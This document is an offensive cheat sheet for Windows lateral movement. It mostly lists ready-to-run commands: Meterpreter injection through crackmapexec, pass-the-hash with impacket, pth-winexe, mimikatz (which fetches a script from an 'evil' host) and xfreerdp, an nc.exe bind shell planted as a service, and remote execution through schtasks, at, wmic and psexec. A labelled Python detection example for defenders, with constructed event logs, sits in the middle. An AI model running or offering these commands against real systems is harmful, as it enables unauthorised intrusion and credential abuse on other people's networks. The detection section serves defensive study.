Lateral movement

Set up the Metasploit handler, then inject Meterpreter with the crackmapexec metinject module:

set payload windows/meterpreter/reverse_https
crackmapexec <ip> -u <user> -p <password> -d <domain> -M metinject -o LHOST=<ip> LPORT=<port>


Use -x to run a cmd command and -X to run a PowerShell command. This works fine combined with an msfvenom psh-cmd payload.

crackmapexec <ip> -u <user> -p <password> -d <domain> -<x/X> <command>


If you only have the NTLM hash, pad it (empty LM half, as in the -hashes :<hash> form below) and pass the hash:

crackmapexec <ip> -u <user> -H "<lm>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:"\"<C:\Program Files\Internet Explorer\IEXPLORE.EXE>\" <http://evil/f.ps1>"
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
.\psexec64.exe \\<ip> -u .\<administrator> -p <password> cmd.exe
use exploit/windows/smb/psexec

Remote invoke executable

From attacker machine

Via service creation

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Create and start the service (cmd.exe /k dodges the 30-second service start timeout)

sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>

Via a scheduled task

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Verify that the Schedule service is running and start it if not

sc \\<targetip> query schedule
sc \\<targetip> start schedule

3. Check the current local time on the target machine

net time \\<targetip>

4. Schedule the job

schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>
at \\<targetip> <HH:MM> <A/P> <command>

5. Verify the job status

schtasks /query /s <targetip>
at \\<targetip>

Via WMI (single target, or a list of targets one per line)

wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>

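Each of the three techniques above (sc create, schtasks/at, wmic process call create) leaves a distinct event on the target host. The following detection logic is an added example for defenders, not part of the cheat sheet; it scans normalised Windows/Sysmon event dicts and ties each artefact to the most recent network logon on that host. The event records and the field layout are constructed for the example.

```python
"""Detection logic for the remote-execution tricks in this section (added
example, not part of the cheat sheet). Each technique leaves an event on the
target; this scans normalised event dicts and ties each artefact to the last
network logon (4624, LogonType 3) on that host, i.e. the "net use" session.
Field names follow Windows/Sysmon event fields; records are constructed."""
import re
from typing import Optional

# sc create binpath= "cmd.exe /k ..." and similar non-service binaries
SUSPICIOUS_BIN = re.compile(r"cmd\.exe\s+/[kc]\b|powershell|nc\.exe", re.I)

def classify(ev: dict) -> Optional[str]:
    """Map one event to a lateral-movement technique, or None if benign."""
    eid = ev.get("EventID")
    if eid == 7045 and SUSPICIOUS_BIN.search(ev.get("ImagePath", "")):
        return "service creation (sc create)"            # System log 7045
    if eid == 4698:
        return "scheduled task creation (schtasks/at)"   # Security log 4698
    if eid == 1 and ev.get("ParentImage", "").lower().endswith("\\wmiprvse.exe"):
        return "WMI process creation (wmic process call create)"  # Sysmon 1
    return None

def detect(events: list) -> list:
    """Return (host, technique, source_ip) for each suspicious event. Events
    must be in time order; source_ip is the last type-3 logon on that host."""
    last_net_logon = {}  # host -> IpAddress of the most recent network logon
    alerts = []
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == 4624 and ev.get("LogonType") == 3:
            last_net_logon[host] = ev.get("IpAddress", "?")
            continue
        technique = classify(ev)
        if technique:
            alerts.append((host, technique, last_net_logon.get(host, "unknown")))
    return alerts

# Constructed sample events (chronological); the Spooler 7045 is a benign control.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "WS01", "LogonType": 3, "IpAddress": "10.0.0.5"},
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "svc1",
     "ImagePath": r"cmd.exe /k c:\tools\nc.exe -L -p 4444 -e cmd.exe"},
    {"EventID": 7045, "Computer": "WS01", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 4698, "Computer": "WS02", "TaskName": r"\update"},
    {"EventID": 1, "Computer": "WS03", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
]
```

Running detect(SAMPLE_EVENTS) yields one alert per technique, with the WS01 service creation attributed to the 10.0.0.5 SMB session and the others marked unknown because no network logon preceded them in the sample.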
From compromised machine

Not tested


Target another machine using the credentials of the compromised host

run schtasksabuse -c "<command1>(,command2)" -t <targetip>